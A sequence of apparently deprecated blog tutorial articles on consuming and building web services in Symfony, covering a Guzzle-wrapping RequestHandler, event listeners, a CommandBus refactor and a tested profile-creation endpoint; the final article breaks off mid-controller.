// src: spec/AppBundle/RequestHandler/Listener/JsonResponseListenerSpec.php
namespace spec\AppBundle\RequestHandler\Listener;
use AppBundle\RequestHandler\Event\ReceivedResponse;
use AppBundle\RequestHandler\Response;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class JsonResponseListenerSpec extends ObjectBehavior
{
function it_handles_json_response(ReceivedResponse $receivedResponse, Response $response)
{
$receivedResponse->getResponse()->willReturn($response);
$response->getHeader('Content-Type')->willReturn('application/json');
$response->getBody()->willReturn('{"data":[]}');
$response->setBody(array('data' => array()))->shouldBeCalled();
$this->onReceivedResponse($receivedResponse);
}
function it_does_not_handle_non_json_response(ReceivedResponse $receivedResponse, Response $response)
{
$receivedResponse->getResponse()->willReturn($response);
$response->getHeader('Content-Type')->willReturn('text/html');
$response->getBody()->shouldNotBeCalled();
$this->onReceivedResponse($receivedResponse);
}
function it_fails_to_handle_invalid_json(ReceivedResponse $receivedResponse, Response $response)
{
$receivedResponse->getResponse()->willReturn($response);
$response->getHeader('Content-Type')->willReturn('application/json');
$response->getBody()->willReturn('{"data":[');
$exception = 'Exception';
$this->shouldThrow($exception)->duringOnReceivedResponse($receivedResponse);
}
}
Time to implement the code:
<?php
// File: src/AppBundle/RequestHandler/Listener/JsonResponseListener.php
namespace AppBundle\RequestHandler\Listener;
use AppBundle\RequestHandler\Event\ReceivedResponse;
use Exception;
class JsonResponseListener
{
public function onReceivedResponse(ReceivedResponse $receivedResponse)
{
$response = $receivedResponse->getResponse();
$contentType = $response->getHeader('Content-Type');
if (false === strpos($response->getHeader('Content-Type'), 'application/json')) {
return;
}
$body = $response->getBody();
$json = json_decode($body, true);
if (json_last_error()) {
throw new Exception("Invalid JSON: $body");
}
$response->setBody($json);
}
}
Is it enough to make the tests pass?
./bin/phpspec run
Yes, we can commit:
git add -A
git commit -m 'Created JsonResponseListener'
In order to be able to use this code in our Symfony application, we need to
define those classes as services. Since we'll have a lot of definitions, we'll
create a services directory:
mkdir app/config/services
We'll update services.yml to include our new file:
# File: app/config/services.yml
imports:
- { resource: services/request_handler.yml }
And finally we'll create the request_handler.yml file:
touch app/config/services/request_handler.yml
The first service we'll define is Guzzle:
#file: app/config/services/request_handler.yml
services:
guzzle.client:
class: GuzzleHttp\Client
This allows us to define the GuzzleRequestHandler:
#file: app/config/services/request_handler.yml
app.guzzle_request_handler:
class: AppBundle\RequestHandler\Middleware\GuzzleRequestHandler
arguments:
- "@guzzle.client"
We want to wrap each of these GuzzleRequestHandler calls with events, so we define EventRequestHandler like this:
#file: app/config/services/request_handler.yml
app.event_request_handler:
class: AppBundle\RequestHandler\Middleware\EventRequestHandler
arguments:
- "@event_dispatcher"
- "@app.guzzle_request_handler"
In the future we might add more middlewares (e.g. RetryRequestHandler, StopwatchRequestHandler, etc), so we want to avoid using a service that points directly to an implementation. We can define an alias:
#file: app/config/services/request_handler.yml
app.request_handler:
alias: app.event_request_handler
Finally, we want to define our listener:
#file: app/config/services/request_handler.yml
app.request_handler.json_response_listener:
class: AppBundle\RequestHandler\Listener\JsonResponseListener
tags:
- { name: kernel.event_listener, event: request_handler.received_response, method: onReceivedResponse }
And that's it!
git add -A
git commit -m 'Defined RequestHandler as a service'
We can now send remote request using Guzzle, without coupling ourself to the library. We even implemented an EventRequestHandler to allow extension points, it also provides us an example on how to write more RequestHandler middlewares.
In the next article we'll start using RequestHandler in a specific kind of service: Gateways.
You might be interested in Ivory HttpAdapter, a library very similar to our RequestHandler: it sends remote request through a given client (it supports many of them). It also provides events to hook into its workflow!
Personnaly, I'd rather create my own RequestHandler, as my purpose is to decouple the application from an external library like Guzzle: using a third party library to do so seems a bit ironic. As you can see there's little effort involved, and it has the advantage of providing the strict minimum the application needs.
PSR-7 is a standard currently under review: it defines how frameworks should ideally implement the HTTP protocole.
Since it's not yet accepted, it is subject to change so I wouldn't recommend to follow it yet. Our RequestHandler kind of implement the HTTP protocole, but I'd rather not make it PSR-7 compliant, as it requires the implementation of many features we don't really need.
To get a balanced opinion on the matter, I'd recommend you to read:
]]>Reference: see the phpspec reference article
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fifth article of the series on managing Web Services in a Symfony environment. Have a look at the four first ones:
Our purpose in this third section is to create an application that consumes the previously created web services.
But for now, we'll just bootstrap it, and start to create a RequestHandler!
We will follow the exact same steps as in the chapter 2.1:
Instead of calling our application ws, we'll call it cs (like Consuming Service).
Is the application boostrapped yet? If it is, then we can continue.
In order to consume web services, we need to be able to make remote requests. PHP
provides some native functions for this (file_get_contents, stream_socket_client,
fopen, etc) and we can find many libraries as well (Buzz,
HTTP Full, React, etc).
For this series, we'll use Guzzle:
composer require guzzlehttp/guzzle:~5.0
Let's commit it for now:
git add -A
git commit -m 'Installed Guzzle'
Sometimes we need to decouple our application from the third party libraries it depends on.
For example let's say that we were using Guzzle 4, but we'd like to use Amazon Web Service (AWS) S3 in our project. The issue? It's version 2 depends on Guzzle 3 and its version 3 depends on Guzzle 5. We now need to upgrade our usage of Guzzle everywhere in our application.
To minimize this, we can centralize the usage of Guzzle in one single file. In order to be able to do so, we'll create a RequestHandler:
<?php
// File: src/AppBundle/RequestHandler/RequestHandler.php
namespace AppBundle\RequestHandler;
interface RequestHandler
{
// @return Response
public function handle(Request $request);
}
In our application we can rely on this interface: we own it and it has few chances to change. We'll now create an object that describes the request to send:
./bin/phpspec describe 'AppBundle\RequestHandler\Request'
A minimalistic raw HTTP request looks like the following:
GET /api/v1/profiles HTTP/1.1
Since we don't really care about the protocol's version we can define the constructor with two arguments:
// File: spec/AppBundle/RequestHandler/RequestSpec.php
function it_has_a_verb_and_an_uri()
{
$this->beConstructedWith('GET', '/api/v1/profiles');
$this->getVerb()->shouldBe('GET');
$this->getUri()->shouldBe('/api/v1/profiles');
}
Running the specifications will bootstrap the class for us:
./bin/phpspec run
We can now make the test pass by writing the code:
<?php
// File: src/AppBundle/RequestHandler/Request.php
namespace AppBundle\RequestHandler;
class Request
{
private $verb;
private $uri;
public function __construct($verb, $uri)
{
$this->verb = $verb;
$this->uri = $uri;
}
public function getVerb()
{
return $this->verb;
}
public function getUri()
{
return $this->uri;
}
}
Let's check if it's enough for now:
./bin/phpspec run
All green, we can commit:
git add -A
git commit -m 'Created Request'
A request usually has headers:
// File: spec/AppBundle/RequestHandler/RequestSpec.php
function it_can_have_headers()
{
$this->beConstructedWith('GET', '/api/v1/profiles');
$this->setHeader('Content-Type', 'application/json');
$this->getHeaders()->shouldBe(array('Content-Type' => 'application/json'));
}
Let's boostrap them:
./bin/phpspec run
And complete the code:
// File: src/AppBundle/RequestHandler/Request.php
private $headers = array();
public function setHeader($name, $value)
{
$this->headers[$name] = $value;
}
public function getHeaders()
{
return $this->headers;
}
This makes the test pass:
./bin/phpspec run
That's worth a commit:
git add -A
git commit -m 'Added headers to Request'
The last addition to our request will be the possibility to add a body:
// File: spec/AppBundle/RequestHandler/RequestSpec.php
function it_can_have_a_body()
{
$this->beConstructedWith('GET', '/api/v1/profiles');
$this->setBody('{"wound":"just a flesh one"}');
$this->getBody()->shouldBe('{"wound":"just a flesh one"}');
}
As usual we bootstrap it:
./bin/phpspec run
And then we complete it:
// File: src/AppBundle/RequestHandler/Request.php
private $body;
public function setBody($body)
{
$this->body = $body;
}
public function getBody()
{
return $this->body;
}
Let's make our console green:
./bin/phpspec run
Let's make our console grin:
git add -A
git commit -m 'Added body to Request'
RequestHandler should return a Response object:
./bin/phpspec describe 'AppBundle\RequestHandler\Response'
A minimalistic raw HTTP response looks like the following:
HTTP/1.1 204 NO CONTENT
Since we don't care about both the protocol's version and the reason, we can define the constructor with a single argument:
// File: spec/AppBundle/RequestHandler/ResponseSpec.php
function it_has_a_status_code()
{
$this->beConstructedWith(204);
$this->getStatusCode()->shouldBe(204);
}
Running the specifications will bootstrap the class for us:
./bin/phpspec run
We can now make the test pass by writing the code:
<?php
// File: src/AppBundle/RequestHandler/Response.php
namespace AppBundle\RequestHandler;
class Response
{
private $statusCode;
public function __construct($statusCode)
{
$this->statusCode = $statusCode;
}
public function getStatusCode()
{
return $this->statusCode;
}
}
Let's check if it's enough for now:
./bin/phpspec run
All green, we can commit:
git add -A
git commit -m 'Created Response'
A response can also have headers:
// File: spec/AppBundle/RequestHandler/ResponseSpec.php
function it_can_have_headers()
{
$this->beConstructedWith(204);
$this->setHeaders(array('Content-Type' => 'application/json'));
$this->getHeader('Content-Type')->shouldBe('application/json');
}
Let's boostrap them:
./bin/phpspec run
And complete the code:
// File: src/AppBundle/RequestHandler/Response.php
private $headers = array();
public function setHeaders(array $headers)
{
$this->headers = $headers;
}
public function getHeader($name)
{
return (isset($this->headers[$name]) ? $this->headers[$name] : null);
}
This makes the test pass:
./bin/phpspec run
That's worth a commit:
git add -A
git commit -m 'Added headers to Response'
Last but not least, the response's body:
// File: spec/AppBundle/RequestHandler/ResponseSpec.php
function it_can_have_a_body()
{
$this->beConstructedWith(200);
$this->setBody('{"wound":"just a flesh one"}');
$this->getBody()->shouldBe('{"wound":"just a flesh one"}');
}
As usual we bootstrap it:
./bin/phpspec run
And then we complete it:
// File: src/AppBundle/RequestHandler/Response.php
private $body;
public function setBody($body)
{
$this->body = $body;
}
public function getBody()
{
return $this->body;
}
Let's make our console green:
./bin/phpspec run
Let's make our console grin:
git add -A
git commit -m 'Added body to Response'
We've bootstrapped an application, and created a RequestHandler which will help us to avoid coupling with Guzzle. In the next article, we'll talk about middleware and start to create some RequestHandler implementations (yes, more than one!).
]]>Reference: see the phpspec reference article
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fourth article of the series on managing Web Services in a Symfony environment. Have a look at the three first ones:
You can check the code in the following repository.
In the previous post we've created a first endpoint by taking a few shortcuts. As we wouldn't want to get technical debt, we're going to refactor it.
In order to avoid the mud, we need to remove the logic from the controller. But which logic?
In Symfony, controllers receive a Request and return a Response (this follows the HTTP protocol). It is also the glue between the framework and our application.
From this we can assume that its responsibility is to:
The request's parameters could be legion, we woudln't like to have a method with too many arguments. A way to solve this would be to create a Data Transfer Object (DTO): we would put all those parameters in it and give it to the appropriate service.
The Command Bus pattern is very fitting for this purpose: the DTO is called a Command, its name should
communicate our intention (in our example CreateProfile). It also has the responsibility of
validating user's input (for example converting IDs into integers).
Each Command is associated to only one CommandHandler service which do the actual logic.
Finally, there's the CommandBus: it finds the appropriate CommandHandler for the given Command and executes it. It also executes some routines before and after the call (for example we can flush doctrine after each commands).
Note: CommandHandlers don't return anything.
If you want to find out more on the Command Bus pattern, I'd recommend you to have a look at this series by Matthias Noback:
Since commands are all about sending a message, you can also read Mathias Verraes article on Messaging flavours. He also wrote a nice article on Form, Command and Model validation.
SimpleBus is a small library that fits our purpose:
composer require simple-bus/doctrine-orm-bridge
composer require simple-bus/symfony-bridge
Note: It requires at least PHP 5.4.
You need to register the bundle in our application's kernel:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
$bundles = array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Symfony\Bundle\SecurityBundle\SecurityBundle(),
new Symfony\Bundle\TwigBundle\TwigBundle(),
new Symfony\Bundle\MonologBundle\MonologBundle(),
new Symfony\Bundle\SwiftmailerBundle\SwiftmailerBundle(),
new Symfony\Bundle\AsseticBundle\AsseticBundle(),
new Doctrine\Bundle\DoctrineBundle\DoctrineBundle(),
new Sensio\Bundle\FrameworkExtraBundle\SensioFrameworkExtraBundle(),
new SimpleBus\SymfonyBridge\SimpleBusCommandBusBundle(),
new SimpleBus\SymfonyBridge\SimpleBusEventBusBundle(),
new SimpleBus\SymfonyBridge\DoctrineOrmBridgeBundle(),
new AppBundle\AppBundle(),
);
if (in_array($this->getEnvironment(), array('dev', 'test'))) {
$bundles[] = new Symfony\Bundle\DebugBundle\DebugBundle();
$bundles[] = new Symfony\Bundle\WebProfilerBundle\WebProfilerBundle();
$bundles[] = new Sensio\Bundle\DistributionBundle\SensioDistributionBundle();
$bundles[] = new Sensio\Bundle\GeneratorBundle\SensioGeneratorBundle();
}
return $bundles;
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config_'.$this->getEnvironment().'.yml');
}
}
Let's commit this installation:
git add -A
git commit -m 'Installed SimpleBus'
We didn't create a ProfileRepository earlier, but we're going to need it now:
<?php
// File: src/AppBundle/Entity/ProfileRepository.php
namespace AppBundle\Entity;
use Doctrine\ORM\EntityRepository;
class ProfileRepository extends EntityRepository
{
}
We should name the Command after the action we want to do. In our case we want to create a profile:
<?php
// File: src/AppBundle\CommandBus/CreateProfile.php
namespace AppBundle\CommandBus;
use SimpleBus\Message\Message;
class CreateProfile implements Message
{
public $name;
public function __construct($name)
{
$this->name = $name;
}
}
We then need a CommandHandler to do the actual creation. Since there will be some logic, let's create a specification:
./bin/phpspec describe 'AppBundle\CommandBus\CreateProfileHandler'
And now we can describe it:
<?php
// File: spec/AppBundle/CommandBus/CreateProfileHandlerSpec.php
namespace spec\AppBundle\CommandBus;
use AppBundle\CommandBus\CreateProfile;
use AppBundle\Entity\ProfileRepository;
use Doctrine\Common\Persistence\ObjectManager;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class CreateProfileHandlerSpec extends ObjectBehavior
{
const NAME = 'John Cleese';
function let(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$this->beConstructedWith($objectManager, $profileRepository);
}
function it_creates_a_profile(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$profileRepository->findOneBy(array('name' => self::NAME))->willReturn(null);
$createdProfile = Argument::type('AppBundle\Entity\Profile');
$objectManager->persist($createdProfile)->shouldBeCalled();
$this->handle(new CreateProfile(self::NAME));
}
}
This allows us to generate the code's skeleton:
./bin/phpspec run
And to finally write the code to make the test pass:
<?php
// File: src/AppBundle/CommandBus/CreateProfileHandler.php
namespace AppBundle\CommandBus;
use AppBundle\Entity\Profile;
use AppBundle\Entity\ProfileRepository;
use Doctrine\Common\Persistence\ObjectManager;
use SimpleBus\Message\Handler\MessageHandler;
use SimpleBus\Message\Message;
class CreateProfileHandler implements MessageHandler
{
private $objectManager;
private $profileRepository;
public function __construct(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$this->objectManager = $objectManager;
$this->profileRepository = $profileRepository;
}
public function handle(Message $message)
{
$profile = $this->profileRepository->findOneBy(array('name' => $message->name));
$newProfile = new Profile($message->name);
$this->objectManager->persist($newProfile);
}
}
Let's check the tests:
./bin/phpspec run
All green, we can commit:
git add -A
git commit -m 'Created CreateProfileHandler'
Domain validation (e.g. name duplication check) should be handled by the CommandHandler (previously it was done in the controller):
<?php
// File: spec/AppBundle/CommandBus/CreateProfileHandlerSpec.php
namespace spec\AppBundle\CommandBus;
use AppBundle\CommandBus\CreateProfile;
use AppBundle\Entity\ProfileRepository;
use Doctrine\Common\Persistence\ObjectManager;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class CreateProfileHandlerSpec extends ObjectBehavior
{
const NAME = 'John Cleese';
function let(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$this->beConstructedWith($objectManager, $profileRepository);
}
function it_creates_a_profile(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$profileRepository->findOneBy(array('name' => self::NAME))->willReturn(null);
$createdProfile = Argument::type('AppBundle\Entity\Profile');
$objectManager->persist($createdProfile)->shouldBeCalled();
$this->handle(new CreateProfile(self::NAME));
}
function it_cannot_create_the_profile_if_the_name_has_already_been_registered(ProfileRepository $profileRepository)
{
$profile = Argument::type('AppBundle\Entity\Profile');
$profileRepository->findOneBy(array('name' => self::NAME))->willReturn($profile);
$domainException = '\DomainException';
$this->shouldThrow($domainException)->duringHandle(new CreateProfile(self::NAME));
}
}
Note: We try to be as descriptive as necessary in the test methods (a bad example would have been
testThrowsDomainException).
Here's the code to make the test pass:
<?php
// File: src/AppBundle/CommandBus/CreateProfileHandler.php
namespace AppBundle\CommandBus;
use AppBundle\Entity\Profile;
use AppBundle\Entity\ProfileRepository;
use Doctrine\Common\Persistence\ObjectManager;
use SimpleBus\Message\Handler\MessageHandler;
use SimpleBus\Message\Message;
class CreateProfileHandler implements MessageHandler
{
private $objectManager;
private $profileRepository;
public function __construct(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$this->objectManager = $objectManager;
$this->profileRepository = $profileRepository;
}
public function handle(Message $message)
{
$profile = $this->profileRepository->findOneBy(array('name' => $message->name));
if (null !== $profile) {
throw new \DomainException(sprintf('The name "%s" is already taken', $message->name));
}
$newProfile = new Profile($message->name);
$this->objectManager->persist($newProfile);
}
}
Let's check the tests:
./bin/phpspec run
They pass!
git add -A
git commit -m 'Added check on name duplication'
Input validation (e.g. presence of name parameter) should be done in the Command (previously it was done in the controller):
<?php
// File: src/AppBundle\CommandBus/CreateProfile.php
namespace AppBundle\CommandBus;
use SimpleBus\Message\Message;
class CreateProfile implements Message
{
public $name;
public function __construct($name)
{
if (null === $name) {
throw new \DomainException('The "name" parameter is missing from the request\'s body');
}
$this->name = $name;
}
}
Let's commit it:
git add -A
git commit -m 'Added check on name presence in the request'
Our Command and CommandHandler both throw a DomainException, we can catch it in an exception listener and create a nice response:
<?php
// File: src/AppBundle/EventListener/DomainExceptionListener.php
namespace AppBundle\EventListener;
use DomainException;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpKernel\Event\GetResponseForExceptionEvent;
class DomainExceptionListener
{
/**
* @param GetResponseForExceptionEvent $event
*/
public function onKernelException(GetResponseForExceptionEvent $event)
{
$exception = $event->getException();
if (!$exception instanceof DomainException) {
return;
}
$error = $exception->getMessage();
$event->setResponse(new JsonResponse(array('error' => $error), 422));
}
}
It needs to be registerd in the Dependency Injection Container:
# File: app/config/services.yml
services:
app.submit_json_listener:
class: AppBundle\EventListener\SubmitJsonListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.forbidden_exception_listener:
class: AppBundle\EventListener\ForbiddenExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException, priority: 10 }
app.domain_exception_listener:
class: AppBundle\EventListener\DomainExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException, priority: 10 }
We can save it:
git add -A
git commit -m 'Created DomainExceptionListener'
Now that our CommandHandler is ready, we'll define it as a service with its repository:
# File: app/config/services.yml
services:
app.submit_json_listener:
class: AppBundle\EventListener\SubmitJsonListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.forbidden_exception_listener:
class: AppBundle\EventListener\ForbiddenExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException, priority: 10 }
app.domain_exception_listener:
class: AppBundle\EventListener\DomainExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException, priority: 10 }
app.profile_repository:
class: AppBundle\Entity\ProfileRepository
factory_service: doctrine.orm.default_entity_manager
factory_method: getRepository
arguments: ['AppBundle:Profile']
app.create_profile_handler:
class: AppBundle\CommandBus\CreateProfileHandler
arguments:
- "@doctrine.orm.entity_manager"
- "@app.profile_repository"
tags:
- { name: command_handler, handles: AppBundle\CommandBus\CreateProfile }
And call it in the controller:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use AppBundle\CommandBus\CreateProfile;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$name = $request->request->get('name');
$this->get('command_bus')->handle(new CreateProfile($name));
$createdProfile = $this->get('app.profile_repository')->findOneBy(array('name' => $name));
return new JsonResponse($createdProfile->toArray(), 201);
}
}
Note: Since the CommandHandler doesn't return anything, we need to call the repository to get the created profile.
As it happens, we've forgotten to set ProfileRepository in Profile's Entity annotation.
Let's fix it now:
<?php
// File: src/AppBundle/Entity/Profile.php
namespace AppBundle\Entity;
use Doctrine\ORM\Mapping as ORM;
/**
* @ORM\Table(name="profile")
* @ORM\Entity(repositoryClass="AppBundle\Entity\ProfileRepository")
*/
class Profile
{
/**
* @ORM\Column(name="id", type="integer")
* @ORM\Id
* @ORM\GeneratedValue(strategy="AUTO")
*/
private $id;
/**
* @ORM\Column(name="name", type="string", unique=true)
*/
private $name;
public function __construct($name)
{
$this->name = $name;
}
public function toArray()
{
return array(
'id' => $this->id,
'name' => $this->name,
);
}
}
Did we break anything?
make test
No, all tests are super green!
git add -A
git commit -m 'Used CreateProfileHandler in controller'
Technical debt is something we should be able to manage. When the time comes to refactor, design patterns can be a helpful tool.
CommandBus is a nice pattern which allows us to remove imperative logic from the controllers. It's easy to write unit test for CommandHandlers, and they can be reused (creating a profile is surely something we can need elsewhere in our application).
This article concludes the second part of this series on web services in a Symfony environment. In the next one, we'll start a new application which consumes the one we just created.
Note: The web service we described also had a removal endpoint. Since there's not much else to learn, it won't be created in this series.
A lot of things can be improved in the current application, here's some tips for those who'd like to practice:
validator in the CommandHandler and set annotations in the Command)]]>Reference: see the phpspec reference article
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the third article of the series on managing Web Services in a Symfony environment. Have a look at the two first ones:
You can check the code in the following repository.
In this post we'll see how to create profiles:
First things first, we'll write a functional test:
<?php
// File: tests/Controller/ProfileCreationControllerTest.php
namespace AppBundle\Tests\Controller;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$this->app = new \AppKernel('test', false);
$this->app->boot();
}
public function testItCreatesProfiles()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('name' => 'Fawlty Towers'));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(201, $response->getStatusCode(), $response->getContent());
}
}
The test should fail, because the route hasn't been found (404 NOT FOUND):
phpunit -c app
Flabergast! The test fails with a PHP Fatal error: Class 'AppKernel' not found!
Let's fix this by adding the forgotten PHP tag opening in the bootstrap file:
<?php
// File: app/bootstrap.php
require __DIR__.'/bootstrap.php.cache';
require __DIR__.'/AppKernel.php';
Let's check how the tests react:
phpunit -c app
Another failure: the database doesn't exist. We need to create it for the test environment:
php app/console doctrine:database:create --env=test
Let's run the tests once again:
phpunit -c app
This time the test fails for the right reason: the page doesn't exist. To fix this, we'll create an empty controller:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$name = $request->request->get('name');
$createdProfile = array();
return new JsonResponse($createdProfile, 201);
}
}
This should make the test pass:
phpunit -c app
If an error occurs (404 not found), then it might be because of the cache:
php app/console cache:clear --env=test
phpunit -c app
Running tests is becoming cumbersome, let's make it easy using a Makefile:
# Makefile
test:
php app/console cache:clear --env=test
php app/console doctrine:database:create --env=test
phpunit -c app
php app/console doctrine:database:drop --force --env=test
Note: mind the tabs, make doesn't support space indentation.
In order for this to work we'll need to drop the database (because it already exists):
php app/console doctrine:database:drop --force --env=test
Tests can now be run using:
make test
Everything's fine, we can commit our work:
git add -A
git commit -m 'Created profile creation endpoint'
At this point, we'll need to store the profile in a database. For this purpose, we'll use MySQL and Doctrine, so we'll need to create a profile entity.
We'll first generate a skeleton of its specification using phpspec:
./bin/phpspec describe 'AppBundle\Entity\Profile'
Then we'll edit the specification:
<?php
// File: spec/AppBundle/Entity/ProfileSpec.php
namespace spec\AppBundle\Entity;
use PhpSpec\ObjectBehavior;
class ProfileSpec extends ObjectBehavior
{
const NAME = 'Arthur Dent';
function let()
{
$this->beConstructedWith(self::NAME);
}
function it_can_be_converted_to_array()
{
$this->toArray()->shouldBe(array(
'id' => null,
'name' => self::NAME,
));
}
}
Since we're happy with this step, we'll generate a skeleton of the code:
./bin/phpspec run
Of course we need to edit it:
<?php
// File: src/AppBundle/Entity/Profile.php
namespace AppBundle\Entity;
use Doctrine\ORM\Mapping as ORM;
/**
* @ORM\Table(name="profile")
* @ORM\Entity
*/
class Profile
{
/**
* @ORM\Column(name="id", type="integer")
* @ORM\Id
* @ORM\GeneratedValue(strategy="AUTO")
*/
private $id;
/**
* @ORM\Column(name="name", type="string", unique=true)
*/
private $name;
public function __construct($name)
{
$this->name = $name;
}
public function toArray()
{
return array(
'id' => $this->id,
'name' => $this->name,
);
}
}
Let's check if it satisfies our specification:
./bin/phpspec run
It does! With this we can generate our database:
php app/console doctrine:database:create
php app/console doctrine:schema:create
Let's update our Makefile:
# Makefile
prod:
php app/console cache:clear --env=prod
php app/console doctrine:database:create --env=prod
php app/console doctrine:schema:create --env=prod
dev:
php app/console cache:clear --env=dev
php app/console doctrine:database:create --env=dev
php app/console doctrine:schema:create --env=dev
test:
php app/console cache:clear --env=test
php app/console doctrine:database:create --env=test
php app/console doctrine:schema:create --env=test
phpunit -c app
bin/phpspec run
php app/console doctrine:database:drop --force --env=test
This allows us to also run phpspec for tests. Installing a project should be as simple as:
make
And for development we can use:
make dev
Note: trying to run a second time
makeormake devwill fail as the database already exists. We'll need to run respectivelyphp app/console doctrine:database:drop --force --env=prodandphp app/console doctrine:database:drop --force --env=dev, but we should really run those commands only once.
It is time to commit our progress:
git add -A
git commit -m 'Created Profile entity'
The only thing missing in our application is the actual creation of the profile. Before doing anything with the code, we'll need to update our functional test: we don't want the data to be actually persisted, as it would make the test fail on a second run:
<?php
// File: tests/Controller/ProfileCreationControllerTest.php
namespace AppBundle\Tests\Controller;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
private $em;
protected function setUp()
{
$this->app = new \AppKernel('test', true);
$this->app->boot();
$this->em = $this->app->getContainer()->get('doctrine.orm.entity_manager');
$this->em->beginTransaction();
}
public function testItCreatesProfiles()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('name' => 'Fawlty Towers'));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(201, $response->getStatusCode(), $response->getContent());
}
protected function tearDown()
{
$this->em->rollback();
$this->em->close();
}
}
Let's update the controller:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use AppBundle\Entity\Profile;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$em = $this->get('doctrine.orm.entity_manager');
$createdProfile = new Profile($request->request->get('name'));
$em->persist($createdProfile);
$em->flush();
return new JsonResponse($createdProfile->toArray(), 201);
}
}
Time to run the tests:
make test
All green! We can commit:
git add -A
git commit -m 'Saved created profile in database'
Our endpoint should return an error if the "name" parameter is missing. Let's add a functional test for this:
<?php
// File: tests/Controller/ProfileCreationControllerTest.php
namespace AppBundle\Tests\Controller;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationControllerTest extends PHPUnit_Framework_TestCase
{
private $app;
private $em;
protected function setUp()
{
$this->app = new \AppKernel('test', true);
$this->app->boot();
$this->em = $this->app->getContainer()->get('doctrine.orm.entity_manager');
$this->em->beginTransaction();
}
public function testItCreatesProfiles()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('name' => 'Fawlty Towers'));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(201, $response->getStatusCode(), $response->getContent());
}
public function testItFailsIfNameIsMissing()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('no-name' => ''));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(422, $response->getStatusCode(), $response->getContent());
}
protected function tearDown()
{
$this->em->rollback();
$this->em->close();
}
}
It should make our tests fail:
make test
We can make this test pass by adding a simple check:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
